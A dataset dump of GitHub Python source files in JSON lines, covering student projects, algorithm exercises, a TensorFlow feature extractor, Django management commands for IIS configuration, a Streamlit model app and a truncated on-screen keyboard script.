wallets\n","repo_name":"MarcDufresne/m0rkcoin-tip-bot","sub_path":"m0rkcoin_tip_bot/wallet.py","file_name":"wallet.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"17811828017","text":"\"\"\"\nCAP4630: Project1 - Python Basics\n\nDescription: This project was designed to parse a csv file containing records of each state including \na 2022 report for each state's population size, median household income, and covid cases & casualties. \nThese records are then placed into a state list with various fields\n\nThe program will search for a csv file to which it will then prompt the user to choose amongst serval actions.\nIf any input does not meet the program's requirements, an error message will appear. The actions include: \nprinting a state report, sort the states by name, sort the states by full vaccination rates, find and print \na particular state's records, display a Spearman's Rho correlation, for {Case Rate, Death Rate} \nx {Median Household Income, Violent Crime Rates, Full Vaccination Rates}. If any of these actions are no longer \nrequested, the user will have the option to quit from the program.\n\nAuthor: Eyob Tekle\nVersion: February 4, 2022\nEmail: N01239628@unf.edu\n\"\"\"\nimport csv\nfrom State import *\n\n\"\"\"\nDescription: prints out each states' name, median household income, violent crime rate, covid fatality rate, \n case rate, death rate, and full vaccination rate\n:param state name\n:return N/A\n\"\"\"\ndef stateReport(states):\n space = \" \"\n print(\"\\nName %15s MHI %8s VCR %8s CFR %10s Case Rate %5s Death Rate %2s FVR\\n\" \n \"------------------------------------------------\"\n \"---------------------------------------------------\" \n %(space, space, space, space, space, space))\n for x in states:\n poprate = psample / int(x.get_pop())\n print(\"%-20s %s %12.1f %15.6f %14.2f %13.2f %13.4f\"\n\t\t\t %(x.get_name(), x.get_income(), float(x.get_violent()),\n int(x.get_deaths())/int(x.get_cases()), int(x.get_cases()) * poprate, \n int(x.get_deaths()) * poprate, float(x.get_vaccine())/100))\n #End For Loop\n\n\"\"\"\nDescription: Sorts state list based on state fatality rate using mergesort\n:param state object\n:return N/A\n\"\"\"\ndef fatalitySorter(states):\n\n if(len(states) <= 1):\n return\n else:\n mid = len(states) >> 1\n left = states[:mid]\n right = states[mid:] \n\n fatalitySorter(left)\n fatalitySorter(right) \n\n l_dex = r_dex = s_dex = 0\n\n while(l_dex < len(left) and r_dex < len(right)):\n if(int(left[l_dex].get_deaths())/int(left[l_dex].get_cases()) < int(right[r_dex].get_deaths())/int(right[r_dex].get_cases())):\n states[s_dex] = left[l_dex]\n l_dex += 1\n else:\n states[s_dex] = right[r_dex]\n r_dex += 1\n s_dex += 1\n #Enf While Loop\n while(l_dex) < len(left):\n states[s_dex] = left[l_dex]\n l_dex += 1\n s_dex += 1\n #End While Loop\n while(r_dex < len(right)):\n states[s_dex] = right[r_dex]\n r_dex += 1\n s_dex += 1\n #End While Loop\n\n\"\"\"\nDescription: partitions a list during quicksort\n:param state list\n:param lower bound limit\n:param upper bound limit\n:return new upper binding limit\n\"\"\"\ndef partition(states, low_bound, up_bound):\n left_part = low_bound\n right_part = up_bound - 1\n pivot = states[up_bound].get_name()\n \n while True:\n while(states[left_part].get_name() < pivot):\n left_part += 1\n \n while(right_part + 1 > 0 and states[right_part].get_name() > pivot):\n right_part -= 1\n\n if(left_part >= right_part):\n break\n else:\n (states[left_part],states[right_part]) = (states[right_part],states[left_part])\n \n (states[left_part],states[up_bound]) = (states[up_bound],states[left_part])\n return left_part\n\n\"\"\"\nDescription: sorts state list based on state name using quicksort\n:param state object\n:param list lower bound\n:param list upper bound\n:return N/A\n\"\"\"\ndef nameSorter(states, low_bound, up_bound):\n if(up_bound - low_bound <= 0 or len(states) == 1):\n return\n else:\n part = partition(states, low_bound, up_bound)\n\n nameSorter(states, low_bound, part - 1)\n nameSorter(states, part + 1, up_bound)\n\n\"\"\"\nDescription: finds a state based on user input and prints records\n:param user input in the form of a state name\n:param boolean variable, checks which sort method was used\n:param state list\n:return N/A\n\"\"\"\ndef state_finder(key, nSort, states):\n num2 = 0\n if(nSort == True):\n low_bound = 0\n up_bound = len(states) - 1\n\n print(\"Using Binary Search...\\n\")\n\n while(low_bound <= up_bound):\n \n mid = (low_bound + up_bound) >> 1\n if(states[mid].get_name() == key):\n num2 = mid\n break\n elif(states[mid].get_name() > key):\n up_bound = mid - 1\n else:\n low_bound = mid + 1\n else:\n j = 0\n\n print(\"Using Sequential Search...\\n\")\n\n while(j < len(states)):\n if(states[j].get_name() == key):\n break\n j += 1\n \n num2 = 0 if j == 50 else j\n\n if(states[num2].get_name() != key):\n print(\"Sorry, but '\" + key +\"' was not found.\\n\")\n else:\n poprate = psample/int(states[num2].get_pop())\n space = \" \"\n print(\"State Search Succedsul\\n\"\n \"Name: %10s%s\\n\"\n \"MHI: %11s%s\\n\"\n \"VCR: %11s%.1f\\n\"\n \"CFR: %11s%.6f\\n\"\n \"Case Rate: %5s%.2f\\n\"\n \"Death Rate: %4s%.2f\\n\"\n \"FV Rate: %7s%.3f\\n\"\n %(space, states[num2].get_name(), space, states[num2].get_income(), space, float(states[num2].get_violent()), space, \n int(states[num2].get_deaths())/int(states[num2].get_cases()), space, int(states[num2].get_cases()) * poprate, space,\n int(states[num2].get_deaths()) * poprate, space, float(states[num2].get_vaccine())/100))\n \n\"\"\"\nDescription: this method displays the Spearman's Rho correlation between the states'\n covid case rate & median household income,\n covid case rate & violent crime rate,\n covid case rate & full vaccination rate,\n covid death rate & median household income,\n covid death rate & violent crime rate, and\n covid death rate & full vaccination rate.\n:param state list\n:return N/A\n\"\"\"\ndef spearman_rho(states):\n \n rho1 = rho2 = rho3 = rho4 = rho5 = rho6 = 0.0000\n tempMHI = []\n medHI = []\n tempVCR = []\n caseRank = []\n deathRank = []\n vRate = []\n tempFVR = []\n fullVR = []\n cRate = []\n dRate = []\n\n for x in states:\n tempMHI.append(int(x.get_income()))\n medHI.append(int(x.get_income()))\n tempVCR.append(float(x.get_violent()))\n vRate.append(float(x.get_violent()))\n tempFVR.append(float(x.get_vaccine()))\n fullVR.append(float(x.get_vaccine()))\n cRate.append(int(x.get_cases()) * psample / int(x.get_pop()))\n dRate.append(int(x.get_deaths()) * psample / int(x.get_pop()))\n caseRank.append(int(x.get_cases()) * psample / int(x.get_pop()))\n deathRank.append(int(x.get_deaths()) * psample / int(x.get_pop()))\n\n for x in range(1, len(states)):\n tempInc = medHI[x]\n tempCsRt = cRate[x]\n tempDthRt = dRate[x]\n tempCrime = vRate[x]\n tempFull = fullVR[x]\n\n in1 = in2 = in3 = in4 = in5 = x - 1\n\n while(in1 >= 0 and cRate[in1] > tempCsRt):\n cRate[in1 + 1] = cRate[in1]\n in1 -= 1\n while(in2 >= 0 and dRate[in2] > tempDthRt):\n dRate[in2 + 1] = dRate[in2]\n in2 -= 1\n while(in3 >= 0 and medHI[in3] > tempInc):\n medHI[in3 + 1] = medHI[in3]\n in3 -= 1\n while(in4 >= 0 and vRate[in4] > tempCrime):\n vRate[in4 + 1] = vRate[in4]\n in4 -= 1\n while(in5 >= 0 and fullVR[in5] > tempFull):\n fullVR[in5 + 1] = fullVR[in5]\n in5 -= 1\n\n cRate[in1 + 1] = tempCsRt\n dRate[in2 + 1] = tempDthRt\n medHI[in3 + 1] = tempInc\n vRate[in4 + 1] = tempCrime\n fullVR[in5 + 1] = tempFull\n #End For Loop \n ranking(caseRank,cRate)\n ranking(deathRank,dRate)\n ranking(tempMHI,medHI)\n ranking(tempVCR,vRate)\n ranking(tempFVR,fullVR)\n\n for x in range(0, len(states)):\n rho1 += (caseRank[x] - tempMHI[x]) ** 2\n rho2 += (caseRank[x] - tempVCR[x]) ** 2\n rho3 += (caseRank[x] - tempFVR[x]) ** 2\n rho4 += (deathRank[x] - tempMHI[x]) ** 2\n rho5 += (deathRank[x] - tempVCR[x]) ** 2\n rho6 += (deathRank[x] - tempFVR[x]) ** 2\n\n p = len(states) * ((len(states) ** 2) - 1)\n\n rho1 = 1 - (6 * rho1 / p)\n rho2 = 1 - (6 * rho2 / p)\n rho3 = 1 - (6 * rho3 / p)\n rho4 = 1 - (6 * rho4 / p)\n rho5 = 1 - (6 * rho5 / p)\n rho6 = 1 - (6 * rho6 / p)\n\n print(\"\\n------------------------------------------------------------------\\n\"\n\t\t \"|\\t\\t|\\tMHI\\t |\\tVCR\\t | \\tFVR\\t | \\n\"\n\t\t \"------------------------------------------------------------------\\n\"\n\t\t \"| Case Rate | %.4f\\t | %.4f\\t | %.4f\\t |\\n\"\n\t\t \"------------------------------------------------------------------\\n\"\n\t\t \"| Death Rate | %.4f\\t | %.4f\\t | %.4f\\t |\\n\"\n\t\t \"------------------------------------------------------------------\\n\" %(rho1, rho2, rho3, rho4, rho5, rho6))\n \n\"\"\"\nDescription: This method searches a list contain a certain state field and rates it's rank\n:param unsorted state list object\n:param sorted state list object\n:return N/A\n\"\"\"\ndef ranking(rate, sortedRate):\n for x in range (0, len(rate)):\n low_bound = 0\n up_bound = len(rate) - 1\n\n while(low_bound <= up_bound):\n mid = (low_bound + up_bound) >> 1\n if(sortedRate[mid] == rate[x]):\n rate[x] = mid + 1\n break\n elif(sortedRate[mid] > rate[x]):\n up_bound = mid - 1\n else:\n low_bound = mid + 1\n #End If/Else\n #End While\n #End For\n#End Method\n\n\nnum = 0\nnameSorted = False\nstates = []\npsample = 100000\n\ntry:\n f = open('States.csv', 'r') \n next(f) #End Try\nexcept IOError:\n print('cannot open file') #End Except\n\nlines = csv.reader(f)\n\nfor s in lines:\n state = State(*s)\n states.append(state)\n\nwhile True:\n try:\n print(\"\\n Would you like to :\\n\"\n + \"1. Print A State Report\\n\"\n + \"2. Sort By State Name\\n\"\n + \"3. Sort By Case Fatailty Rate\\n\"\n + \"4. Find And Print A State For A Given Name\\n\"\n + \"5. Print Spearman's \\u03C1 Correlation Matrix\\n\"\n + \"6. QUIT\")\n\n num = int(input())\n #End Try\n except ValueError:\n while True:\n try:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" %num)\n num = int(input())\n break\n except ValueError:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" %num)\n #End Except\n if num == 1:\n stateReport(states)\n elif num == 2:\n nameSorter(states, 0, len(states) - 1)\n print(\"States Have Been Sorted By Name.\\n\")\n nameSorted = True\n elif num == 3:\n fatalitySorter(states)\n print(\"States Have Been Sorted By Fatality Rate\\n\")\n nameSorted = False\n elif num == 4:\n print(\"Which State Are You Searching: \")\n state_finder(input(), nameSorted, states)\n elif num == 5:\n spearman_rho(states)\n elif num == 6:\n print(\"Goodbye!\\n\")\n break\n else:\n print(\"%s Is Not A Valid Input: Please Enter 1 - 6!\" % num)\n\nf.close()","repo_name":"etekle/State_Records","sub_path":"Project1.py","file_name":"Project1.py","file_ext":"py","file_size_in_byte":11791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38674112326","text":"TotalSum = 0 \nValue = [] #values to be added\n\n#Range we got and then comparing the values according to criteria\nfor i in range(10, 354294): \n Sum = 0 #This sum is for getting one single value \n for x in Str(i):\n Sum += int(x) ** 5 #checking for main condition with power 5 \n if Sum == i: #If the sum matches with the value \n Value.append(i) #The value we are in search for \n\n# We add those values stored in the list to get totalsum\nfor i in Value:\n TotalSum += i\n\nprint (\"Values :\" , Value)\nprint (\"TotalSum :\" , TotalSum)\n","repo_name":"samridhiagarwal/euler30-with-python","sub_path":"euler30.py","file_name":"euler30.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29831199999","text":"# coding: utf-8\nimport sys, os\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nclass VectorGen:\n def __init__(self, conf, logger):\n self._conf = conf\n self._logger = logger\n self._load_inception_model(conf)\n\n def gen_vector(self, listImage):\n listVectors = []\n\n with tf.Session() as sess:\n init = tf.global_variables_initializer()\n sess.run(init)\n\n for img_path in listImage:\n self._logger.debug(\"To generate vector for image: {}\".format(img_path))\n image_data = gfile.FastGFile(img_path, 'rb').read()\n bottleneck_values = self._run_bottleneck_on_image(sess, image_data, self.jpeg_data_tensor, self.bottleneck_tensor)\n listVectors.append(bottleneck_values)\n\n return listVectors\n\n def _load_inception_model(self, conf): # 读取模型\n self._logger.info(\"Load inception v3 model: {} {}\".format(conf['inception_v3']['model_dir'], conf['inception_v3']['model_file']))\n with gfile.FastGFile(os.path.join(conf['inception_v3']['model_dir'], conf['inception_v3']['model_file']), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n # 加载模型,返回对应名称的张量\n self.bottleneck_tensor, self.jpeg_data_tensor = tf.import_graph_def(graph_def,\n return_elements=[conf['inception_v3']['bottleneck_data_name'],\n conf['inception_v3']['image_data_name']])\n\n def _run_bottleneck_on_image(self, sess, image_data, image_data_tensor, bottleneck_tensor):\n bottleneck_values = sess.run(bottleneck_tensor, {image_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n return bottleneck_values\n\n\n","repo_name":"danny1984/image_search_app","sub_path":"query_process/src/vector_gen/tf_vector_gen.py","file_name":"tf_vector_gen.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"23956939485","text":"def showPos(s):\n apos=[]\n bpos=[]\n for i in range(0,len(s)):\n if(s[i]==\"A\"):\n apos.append(i)\n elif(s[i]=='B'):\n bpos.append(i)\n return apos,bpos\ndef acheck(i,bpos,s):\n if(i-1== -1 or s[i-1] !='-'):\n return False\n else:\n for j in bpos:\n if (j+1 == i-1):\n return False\n return True\ndef bcheck(i,apos,s):\n if(i+1== len(s) or s[i+1] !='-'):\n return False\n else:\n for j in apos:\n if (j-1 == i+1):\n return False\n return True\n\nn=int(input())\ns=input().split()\napos,bpos=showPos(s)\nprint(apos,bpos)\nwhile(len(apos)!=0 and len(bpos) !=0):\n for i in range(0,len(apos)):\n if(acheck(apos[i],bpos,s)):\n apos[i]-=1\n s[apos[i]]=\"A\"\n print(\"test\")\n else:\n apos.remove(apos[i])\n print(s,apos) \n for i in range(0,len(bpos)):\n if(bcheck(bpos[i],apos,s)):\n print(\"test\")\n bpos[i]+=1\n s[bpos[i]]=\"B\" \n else:\n bpos.remove(bpos[i])\nprint(s)","repo_name":"Moinkhan8439/Python-Program","sub_path":"tcs/election.py","file_name":"election.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3204248385","text":"#cislo = int('abc')\nprint('ahoj')\nif 1 < 2:\n #print(1/'1')\n print(3)\n\nwhile True:\n vstup = input('Zadej cislo: ')\n try:\n cislo = int(vstup)\n vysledek = 100 / cislo\n except (ValueError, ZeroDivisionError):\n print('Zadala jsi blbost.')\n else:\n print('vysledek je: ', vysledek)\n break\n\nnasobek = cislo * 27\nprint(nasobek)\n","repo_name":"MainHackerman/lekce11","sub_path":"chyby.py","file_name":"chyby.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37309784676","text":"from django.core.management.base import BaseCommand\n\nfrom home.models import SVGToPNGMap\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for map in SVGToPNGMap.objects.all():\n map.png_image_file.delete()\n map.delete()\n\n self.stdout.write(self.style.SUCCESS('SVG to PNG map cleared.'))\n","repo_name":"unicef/iogt","sub_path":"home/management/commands/clear_svg_to_png_map.py","file_name":"clear_svg_to_png_map.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"} +{"seq_id":"10499635989","text":"from cards import deck, name, hand_score\n\n# Players get dealt a number of cards, the cards are determined by the user\n# Whoever has the highest hand wins\n\n# Game gets a deck of cards\n# Players get dealt some cards\n\ncards = deck()\n\nplayer1 = []\nplayer2 = []\n\nfor i in range(1, 6):\n player1 += [cards.pop()]\n player2 += [cards.pop()]\n\nplayer1score = hand_score(player1)\nplayer2score = hand_score(player2)\n\n\nprint(f\"Player 1's hand is {list(map(name, player1))} and their score is {player1score} \")\nprint(f\"Player 2's hand is {list(map(name, player2))} and their score is {player2score}\")\n\n\nif player1score > player2score:\n print(\"Player 1 won\")\nelif player2score > player1score:\n print(\"Player 2 won\")\nelse:\n print(\"It's a draw\")\n","repo_name":"SamBpilot/python-examples","sub_path":"Cards/CardGame.py","file_name":"CardGame.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70222164942","text":"import os\nfrom pathlib import Path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandParser\nfrom django.template.loader import render_to_string\n\n\nclass Command(BaseCommand):\n help = \"Generate a web.config files for IIS Configuration.\"\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument(\"--name\", \"-n\", default=\"Django FastCGI\", type=str, help=\"FastCGI Handler Name\")\n parser.add_argument(\"--static\", \"-s\", action=\"store_true\", help=\"Configure IIS to serve static folder\")\n parser.add_argument(\"--media\", \"-m\", action=\"store_true\", help=\"Configure IIS to serve media folder\")\n parser.add_argument(\"--windowsauth\", \"-w\", action=\"store_true\", help=\"Configure IIS for Windows Authentication\")\n parser.add_argument(\"--https\", action=\"store_true\", help=\"Configure IIS to redirect HTTP to HTTPS\")\n parser.add_argument(\"--logs\", \"-l\", default=settings.BASE_DIR / \"logs\", type=str, help=\"Logs folder path\")\n parser.add_argument(\"--override\", \"-f\", action=\"store_true\", help=\"Force override existing files\")\n\n def handle(self, name=None, static=False, media=False,\n windowsauth=False, https=False, logs=None, override=False, **options):\n mode = \"w\" if override else \"x\"\n virtual_dirs = []\n\n # add static virtual directory\n if static:\n virtual_dirs.append({\n \"url\": settings.STATIC_URL,\n \"path\": settings.STATIC_ROOT,\n })\n\n # add media virtual directory\n if media:\n virtual_dirs.append({\n \"url\": settings.MEDIA_URL,\n \"path\": settings.MEDIA_ROOT,\n })\n\n # create root website web.config\n try:\n with open(\"web.config\", mode) as file:\n file.write(render_to_string(\n \"windows_auth/iis_configs/root.config\",\n {\n \"django_settings\": os.environ[\"DJANGO_SETTINGS_MODULE\"],\n \"base_dir\": settings.BASE_DIR,\n \"venv_path\": os.environ[\"VIRTUAL_ENV\"],\n \"handler_name\": name,\n \"wsgi\": settings.WSGI_APPLICATION,\n \"logs_folder\": logs,\n \"windows_auth\": windowsauth,\n \"https\": https,\n })\n )\n print(\"Created web.config file\")\n except FileExistsError:\n print(\"web.config already exist. Use --override / -f to force override of the existing web.config.\")\n\n # create a web.config to allow serving static files for each virtual directory path\n for virtual_dir in virtual_dirs:\n # create folder if does not exist\n if not os.path.exists(virtual_dir[\"path\"]):\n print(virtual_dir['url'] + \" virtual directory source folder does not exist, creating...\")\n os.makedirs(virtual_dir[\"path\"])\n\n try:\n with open(Path(virtual_dir[\"path\"]) / \"web.config\", mode) as file:\n file.write(render_to_string(\n \"windows_auth/iis_configs/serve.config\",\n {\"handler_name\": name})\n )\n print(\"Created web.config file for \" + virtual_dir['url'] + \" virtual directory\")\n except FileExistsError:\n print(virtual_dir['url'] + \" web.config already exist. Use --override / -f to force \"\n \"override of the existing web.config.\")\n","repo_name":"danyi1212/django-windowsauth","sub_path":"windows_auth/management/commands/createwebconfig.py","file_name":"createwebconfig.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"47"} +{"seq_id":"75181562703","text":"class Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # dp[i] 当去到第i家时、窃取的最大金额\n if len(nums) == 1:\n return nums[0]\n # 前一家的最大 或者 前两家与这一家的最大\n return max(self.rob_2(nums[1:]), self.rob_2(nums[:-1]))\n\n def rob_2(self, nums):\n if len(nums) == 1:\n return nums[0]\n dp = [0] * (len(nums))\n dp[0] = nums[0]\n dp[1] = max(nums[1], nums[0])\n for i in range(2, len(nums)):\n dp[i] = max(dp[i-1], dp[i-2] + nums[i])\n return dp[-1]","repo_name":"XiaofengYue/LeetCode-Python","sub_path":"动态规划/213.py","file_name":"213.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12258027262","text":"# 二分查找\nclass Solution:\n def binarySearch(self, array, key):\n left = 0\n right = len(array)\n\n while(left < right):\n middle = int((right + left) / 2)\n if array[middle] == key:\n return middle\n elif array[middle] > key:\n right = middle - 1\n else:\n left = middle + 1\n return -1\n\nif __name__ == '__main__':\n print(Solution().binarySearch([1,3,5,6,8,9], 10))","repo_name":"moxi624/LearningNotes","sub_path":"数据结构/NowCode/A1_binarySearch.py","file_name":"A1_binarySearch.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":637,"dataset":"github-code","pt":"47"} +{"seq_id":"72259449743","text":"# Always prefer setuptools over distutils\nimport setuptools\n\n# Get the long description from the README file\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\n__version__ = \"0.0.3\"\n\nREPO_NAME = \"IPYNBrenderer\"\nAUTHOR_USER_NAME = \"MaheshKumarMK\"\nSRC_REPO = \"IPYNBrenderer\"\nAUTHOR_EMAIL = \"maheshmkvb92@gmail.com\"\n\n\nsetuptools.setup(\n # This is the name of your project. The first time you publish this\n # package, this name will be registered for you. It will determine how\n # users can install this project, e.g.:\n #\n # $ pip install sampleproject\n #\n # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n #\n # There are some restrictions on what makes a valid project name\n # specification here:\n # https://packaging.python.org/specifications/core-metadata/#name\n name=SRC_REPO,\n version=__version__,\n # Versions should comply with PEP 440:\n # https://www.python.org/dev/peps/pep-0440/\n #\n # For a discussion on single-sourcing the version across setup.py and the\n # project code, see\n # https://packaging.python.org/guides/single-sourcing-package-version/\n author=AUTHOR_USER_NAME,\n author_email=AUTHOR_EMAIL,\n description=\"A small python package\",\n # This is a one-line description or tagline of what your project does. This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n \n long_description=long_description, \n # This is an optional longer description of your project that represents\n # the body of text which users will see when they visit PyPI.\n #\n # Often, this is the same as your README, so you can just read it in from\n # that file directly (as we have already done above)\n #\n # This field corresponds to the \"Description\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-optional\n \n long_description_content=\"text/markdown\", #to render some format\n # Denotes that our long_description is in Markdown; valid values are\n # text/plain, text/x-rst, and text/markdown\n #\n # Optional if long_description is written in reStructuredText (rst) but\n # required for plain-text or Markdown; if unspecified, \"applications should\n # attempt to render [the long_description] as text/x-rst; charset=UTF-8 and\n # fall back to text/plain if it is not valid rst\" (see link below)\n #\n # This field corresponds to the \"Description-Content-Type\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-content-type-optional\n \n \n \n url=f\"https://github.com/{AUTHOR_USER_NAME}/{REPO_NAME}\",\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n project_urls={\n \"Bug Tracker\": f\"https://github.com/{AUTHOR_USER_NAME}/{REPO_NAME}/issues\",\n },\n # List additional URLs that are relevant to your project as a dict.\n #\n # This field corresponds to the \"Project-URL\" metadata fields:\n # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n #\n # Examples listed include a pattern for specifying where the package tracks\n # issues, where the source is hosted, where to say thanks to the package\n # maintainers, and where to support the project financially. The key is\n # what's used to render the link text on PyPI.\n # project_urls={ # Optional\n # \"Bug Reports\": \"https://github.com/pypa/sampleproject/issues\",\n # \"Funding\": \"https://donate.pypi.org\",\n # \"Say Thanks!\": \"http://saythanks.io/to/example\",\n # \"Source\": \"https://github.com/pypa/sampleproject/\"\n package_dir={\"\": \"src\"},\n # When your source code is in a subdirectory under the project root, e.g.\n # `src/`, it is necessary to specify the `package_dir` argument.\n packages=setuptools.find_packages(where=\"src\")\n # You can just specify package directories manually here if your project is\n # simple. Or you can use find_packages().\n #\n # Alternatively, if you just want to distribute a single Python file, use\n # the `py_modules` argument instead as follows, which will expect a file\n # called `my_module.py` to exist:\n #\n # py_modules=[\"my_module\"],\n \n)","repo_name":"MaheshKumarMK/Python_package_template","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26206554056","text":"# %%writefile app.py%\nimport streamlit as st\nimport pickle\nimport openpyxl\nimport xlrd\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LinearRegression\n\n\n# loading the trained model\nmodel = pickle.load(open('Sportpickle.pkl','rb'))\n\n\ndef main():\n html_temp = \"\"\" \n
\n

Okoye-Nobert Sport Prediction Model

\n
\n \"\"\"\n\n # display the front end aspect\n st.markdown(html_temp, unsafe_allow_html=True)\n default_value_goes_here = \"\"\n\n uploaded_file = st.file_uploader(\"Choose a XLSX file\", type=\"xlsx\")\n\n global dataframe\n if uploaded_file:\n df = pd.read_excel(uploaded_file)\n dataframe = df\n\n result = \"\"\n\n if st.button(\"Predict\"):\n# arr = dataframe.columns\n\n# for i in arr:\n# notnull = dataframe[i][dataframe[i].notnull()]\n# min = notnull.min()\n# dataframe[i].replace(np.nan, min, inplace=True)\n\n# scaler = StandardScaler()\n# scaler.fit(dataframe)\n# featureshost = scaler.transform(dataframe)\n prediction = model.predict(dataframe)\n\n result = prediction\n st.write(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nobert-Ok/SportPrediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41271621984","text":"from parsel.csstranslator import XPathExpr, GenericTranslator, HTMLTranslator\nfrom scrapy.utils.deprecate import create_deprecated_class\n\n\nScrapyXPathExpr = create_deprecated_class(\n 'ScrapyXPathExpr', XPathExpr,\n new_class_path='parsel.csstranslator.XPathExpr')\n\nScrapyGenericTranslator = create_deprecated_class(\n 'ScrapyGenericTranslator', GenericTranslator,\n new_class_path='parsel.csstranslator.GenericTranslator')\n\nScrapyHTMLTranslator = create_deprecated_class(\n 'ScrapyHTMLTranslator', HTMLTranslator,\n new_class_path='parsel.csstranslator.HTMLTranslator')\n","repo_name":"dspray95/open-recipe","sub_path":"venv/Lib/site-packages/scrapy/selector/csstranslator.py","file_name":"csstranslator.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"20377552859","text":"from pynput.mouse import Listener\r\nimport logging\r\nfrom win32gui import FindWindow, GetWindowRect, SetWindowPos\r\nfrom win32con import HWND_TOPMOST\r\nfrom win32api import GetSystemMetrics\r\n\r\ncaps = 0\r\n\r\nlogging.basicConfig(filename=\"mouse_log.txt\", level=logging.DEBUG, format=\"%(asctime)s: %(message)s\")\r\n\r\nhwnd = FindWindow(None, \"Free Virtual Keyboard (www.FreeVirtualKeyboard.com)\")\r\n\r\n# Used to find the dimensions of the window\r\nrect = GetWindowRect(hwnd)\r\nrect_x = rect[0]\r\nrect_y = rect[1]\r\nrect_w = rect[2] - rect_x\r\nrect_h = rect[3] - rect_y\r\n\r\n# print(GetSystemMetrics(0), GetSystemMetrics(1))\r\nis1080p = False\r\nif GetSystemMetrics(0) == 1536 and GetSystemMetrics(1) == 864: # if 1080p then...\r\n is1080p = True\r\n\r\nif is1080p:\r\n SetWindowPos(hwnd, HWND_TOPMOST, 384, 648, 768, 216, 0) # may need another inside 'on_click' for consistent size\r\n\r\nelse:\r\n # 1600x900 position_XY(^^^ / 100)* 96 size_XY (^^^ / 83.33 * 100 not exact? slight adjustment\r\n SetWindowPos(hwnd, HWND_TOPMOST, 330, 650, 952, 254, 0) # may need another inside 'on_click' for consistent size\r\n\r\n\r\n# change caps value f\r\ndef changer():\r\n global caps # need 'global' keyword to change value of global variable\r\n caps = (caps + 5) % 10\r\n\r\n\r\n# lower case keyboard\r\nlower_list = [[\"Esc\", \"F1\", \"F2\", \"F3\", \"F4\", \"F5\", \"F6\", \"F7\", \"F8\", \"F9\", \"F10\", \"F11\", \"F12\", \"Del\"],\r\n [\"`\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"-\", \"=\", \"Backspace\"],\r\n [\"Tab\", \"q\", \"w\", \"e\", \"r\", \"t\", \"y\", \"u\", \"i\", \"o\", \"p\", \"[\", \"]\", \"#\"],\r\n [\"Caps\", \"a\", \"s\", \"d\", \"f\", \"g\", \"h\", \"j\", \"k\", \"l\", \";\", \"'\", \"Enter\"],\r\n [\"Shift\", \"\\ \", \"z\", \"x\", \"c\", \"v\", \"b\", \"n\", \"m\", \",\", \".\", \"/\", \"Shift\"],\r\n [\"Ctrl\", \"Win\", \"Alt\", \"Space\", \"AltGr\", \"Settings\", \"Ctrl\", \"Slider\"]]\r\n\r\n# upper case keyboard\r\nupper_list = [[\"Esc\", \"F1\", \"F2\", \"F3\", \"F4\", \"F5\", \"F6\", \"F7\", \"F8\", \"F9\", \"F10\", \"F11\", \"F12\", \"Del\"],\r\n [\"¬\", \"!\", \"DoubleQuote\", \"£\", \"$\", \"%\", \"^\", \"&\", \"*\", \"(\", \")\", \"_\", \"+\", \"Backspace\"],\r\n [\"Tab\", \"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\", \"{\", \"}\", 